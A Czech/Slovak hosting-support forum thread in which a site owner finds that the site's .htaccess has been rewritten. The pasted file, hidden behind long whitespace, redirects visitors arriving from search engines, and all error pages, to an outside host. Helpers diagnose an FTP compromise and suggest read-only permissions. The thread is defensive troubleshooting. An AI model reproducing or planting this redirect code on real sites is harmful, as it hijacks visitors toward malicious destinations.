#1 2012-04-06 12:20:13

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

Zdravím, dnes jsem přišel na to, že pokud napíšu adresu mé domény do vyhledavače google nebo seznam či jiného a kliknu na ni, tak se mi neotevřou stránky, ale vyhledavač google? V čem může být problém ? doména je tjsmistrice.cz

Offline

#2 2012-04-06 12:32:54

Martin
Endora rádce
Místo: Plzeň
Registrován: 2011-01-19
Příspěvky: 1,375
Web

Re: Nejde doména

Je to proto, že máte web na adrese tjsmistrice.cz a na adrese <!-- w --><a class="postlink" href="http://www.tjsmistrice.cz">www.tjsmistrice.cz</a><!-- w --> máte přesměrování na google. Takže jste si nejšpíš nekde kopíroval kus kódu, který jste vložil to htaccess, tan vám měl přesměrovat právě www na web bez www, jenže jste to jen slepě okopíroval a neupravil. Je to tak? Takže budete mít v souboru htaccess někde napsáno google...


Nejnovější článek: www.zeminem.cz ...
Černé díry jsou místa, kde Bůh dělil nulou...
Endora plugin!

Offline

#3 2012-04-06 12:34:38

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

No já jsem ale do htaccess vůbec nešahal... ale podívam se

Offline

#4 2012-04-06 12:39:18

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

v souboru .htaccess mám zdá se mi nějaký divný kod.
                                                                                                                                                                                                                                               
                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                       
                                                                                                                        RewriteEngine On                                                                                                                       
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                       
                                                                                                                        RewriteRule ^(.*)$ http://bax-vac.ru/in.cgi?4 [R=301,L]                                                                                                                       
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                       
                                                                                                                        RewriteRule ^(.*)$ http://bax-vac.ru/in.cgi?4 [R=301,L]                                                                                                                       
                                                                                                                        </IfModule>                                                                                                                       
                                                                                                                                                                                                                                               


























































                                                                                                                                                                                                                                               
                                                                                                                        ErrorDocument 400 http://bax-vac.ru/in.cgi?4                                                                                                                       
                                                                                                                        ErrorDocument 401 http://bax-vac.ru/in.cgi?4                                                                                                                       
                                                                                                                        ErrorDocument 403 http://bax-vac.ru/in.cgi?4                                                                                                                       
                                                                                                                        ErrorDocument 404 http://bax-vac.ru/in.cgi?4                                                                                                                       
                                                                                                                        ErrorDocument 500 http://bax-vac.ru/in.cgi?4

Offline

#5 2012-04-06 12:41:09

JF
Endora rádce
Místo: ....nice u Plzně
Registrován: 2010-06-22
Příspěvky: 11,894

Re: Nejde doména

Podľa toho kódu všetky požiadavky čo prídu zo strany uvedených vyhľadávačov sú presmerované na adresu uvedenú i pri chybových stránkach na konci tohoto súboru. Zrejme sa ti niekto alebo niečo nabúralo do FTP a zmenilo obsah súboru .htaccess prípadne ak si ho tam nemal tak ho vytvorilo.


Ján Fačkovec - Endora.cz by Webglobe
Email, Web, Webadmin, Webmail, Nápověda, Ceník

Offline

#6 2012-04-06 12:43:31

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

No tak to nehcápu jak se mi mohl někdo připojit na FTP soubor jsem smazal a stránky snad jedou ale tohle nechápu...

Offline

#7 2012-04-06 12:49:24

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

Aha tak problém stále zůstává po smazání soboru se vytvořil znovu !

Offline

#8 2012-04-06 12:54:05

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

A může mi teda někdo poradit co mám udělat abych tam ten VIR nebo co to je neměl ?

Offline

#9 2012-04-06 17:32:16

JF
Endora rádce
Místo: ....nice u Plzně
Registrován: 2010-06-22
Příspěvky: 11,894

Re: Nejde doména

Skús nastaviť súboru .htaccess atribúty na 400 - tj len čítanie vlastníka, tým by sa nemal súbor prepísať, jedine ak napadnutý súbor nekontroluje atribúty daného súboru.


Ján Fačkovec - Endora.cz by Webglobe
Email, Web, Webadmin, Webmail, Nápověda, Ceník

Offline

#10 2012-04-06 20:03:24

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

Nejde mi nahrát soubor .htaccess pres FTP do stránek. Resp. nahraji ho, ale pak se nezobrazi stranky a vypise se chyba 500

Offline

#11 2012-04-06 23:55:12

JF
Endora rádce
Místo: ....nice u Plzně
Registrován: 2010-06-22
Příspěvky: 11,894

Re: Nejde doména

mistrice napsal:

Nejde mi nahrát soubor .htaccess pres FTP do stránek. Resp. nahraji ho, ale pak se nezobrazi stranky a vypise se chyba 500

súbor som nahral na vaše FTP i nastavil atribúty na 400, snáď to pomôže


Ján Fačkovec - Endora.cz by Webglobe
Email, Web, Webadmin, Webmail, Nápověda, Ceník

Offline

#12 2012-04-07 09:39:53

mistrice
Endora uživatel
Registrován: 2011-08-29
Příspěvky: 31

Re: Nejde doména

Zdá se že ano... také jsem si stahl nějaké Antispyware a Antimalware projel PC a zdá se že to opravdu bylo v PC...Snad je již po problému...

Offline

#13 2012-07-10 21:19:09

ajaxtip
Endora uživatel
Registrován: 2011-06-15
Příspěvky: 4

Re: Nejde doména

Dobrý den, tak po nějaké době mám opět ten stejný problém...Můžete mi opět daný soubror nahrát na FTP a nastavit atributy na 400... Mě nahrání přes total comander nejde a nejdou ani změnit atributy děkuji... Jedná se o doménu <!-- w --><a class="postlink" href="http://www.tjsmistrice.cz">www.tjsmistrice.cz</a><!-- w -->

Offline

Zápatí

Založeno na FluxBB | CZ a SK